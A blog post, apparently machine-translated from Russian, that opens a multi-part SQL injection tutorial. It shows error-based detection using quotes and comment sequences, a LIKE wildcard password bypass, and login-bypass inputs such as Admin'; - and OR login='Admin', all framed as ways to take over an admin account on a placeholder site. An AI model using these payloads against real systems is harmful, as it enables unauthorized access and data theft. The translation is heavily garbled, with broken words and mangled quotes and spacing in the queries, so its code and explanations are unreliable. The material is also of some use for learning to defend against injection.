Brief Article Index:
0.INTRO
1.How FIND SQL INJECTION
2.What AND HOW can be learned from this useful
If there is no 3.CHTO The output FIELD
4.CHTO TO DO IF SOMETHING FILTRATION
5.POLEZNYE FUNCTIONS IN MYSQL
6. How to protect against SQL INJECTION
[0.INTRO]
on the internet in search of at least some some info on SQL injection you must have often come across articles or very short, or not understandable, or covering one topic or something else that of course you are not satisfied. When you and I have collected somewhere Articles 10-20 on the subject to grasp many subtleties of this vulnerability. And remembering that time decided to write a full FAQ on this topic, so to say the others did not suffer. And one more request. Those who will find something that I missed where it was wrong, etc. please otpishites below, it is difficult all the same, all to keep in mind. By the way this is my first article, please do not throw tomatoes, and not kicked.
Not carried away by breaking the first day you probably know what a SQL injection if not then I do an article for you. SQL injection on simple injection is a type of attack where the attacker modifies the original query to the database so that when a query was put needed information from the database.
For the assimilation of this article requires:
a) The presence of brain
b) Direct hands
a) Knowledge of SQL language
Basically this article was written for MYSQL + PHP but there are a couple of examples with MSSQL.
Actually I think the best way to learn the proper working of SQL injection is not reading this article, but a living practice, such as most vulnerable to write a script, or use my set out in the end.
By the way I advise read everything because each paragraph is what is important for the next item, etc.
Unfortunately paper does not fit in the limit of 20000 characters so divided into several posts.
1.How SQL INJECTION
It's still pretty easy. We must embed in all fields, variables, cookies and a double single quotes.
1.1 The first case
Let's start with a script here
_http: / / xxx / news.php? Id = 1
Suppose that the original request to the database looks like this:
Code:
SELECT * FROM news WHERE id = '1 ';
_http: / / xxx / news.php? Id = 1 '
if the variable is not filtered and includes error messages that will come out that something like this:
mysql_query (): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
Since the query to the database will attend an extra quote:
Code:
SELECT * FROM news WHERE id = '1'';
If error reporting is turned off in this case, we can determine the presence of vulnerabilities like this (also would not prevent it, that would not be confused with paragraph 1.4. As it is described in the same
That is the query to the database will now be:
Code:
SELECT * FROM news WHERE id = '1 '; -';
_http: / / xxx / news.php? Id = 1
Wait the The rest of the lesson ^_^
Let s continue our lesson
1.2 Second case
In SQL is the operator LIKE. It serves to compare strings. This script is assume authorization when entering login and password database queries like this:
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123 ';
Even if this script filters the quote anyway, it remains vulnerable to injection. We need instead of a password simply enter "%" (For the LIKE operator symbol "%" matches any string) and then the query will
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%';
and we were let inside with the login 'Admin'. In this case, we not only found SQL injection but also successfully used it.
1.3 The third case
What to do if the same script is not checking authorization for quote??
IMHO would be foolish to at least use the injections for the withdrawal of some sort of information. Let the query to a database type:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = '123 ';
Unfortunately the password '123 'is not appropriate, but we found acceptable in injections parameter' login 'and that would be registered under the nickname' Admin ', we need to write, instead of it something like this Admin'; - that is part of the verification password is discarded and we go by the nickname 'Admin'.
Code:
SELECT * FROM users WHERE login = 'Admin'; - 'AND pass = '123';
Now what to do if a vulnerability in the field 'pass'. We fit into this field following 123 'OR login =' Admin '; -. Inquiry will be:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = '123 'OR login =' Admin '; -';
As for the database will be completely indeintichno this query:
Code:
SELECT * FROM users WHERE (login = 'Admin' AND pass = '123 ') OR (login =' Admin ');
And after these steps, we will become full owner of Akka with login 'Admin'.
Return to the script news. From the SQL language, we must remember that the numeric parameters are not put in quotation marks that is at such address to the script
_http: / / xxx / news.php? Id = 1
request to the database looks like this:
Code:
SELECT * FROM news WHERE id = 1;
Detect this injection can also be substituted quotes in the parameter 'id' and then jump out the same error message:
mysql_query (): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
If this message does not vyprigivaet we can understand that the quote is filtered and then need to enter
_http: / / xxx / news.php? Id = 1 bla-bla-bla
DB does not understand it for sho blah blah blah, and displays an error message like:
mysql_query (): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 bla-bla-bla '
If error reporting is turned off then check like this
_http: / / xxx / news.php? Id = 1; --
It must appear exactly as and
_http: / / xxx / news.php? Id = 1
Wait the The rest of the lesson ^_^
No comments:
Post a Comment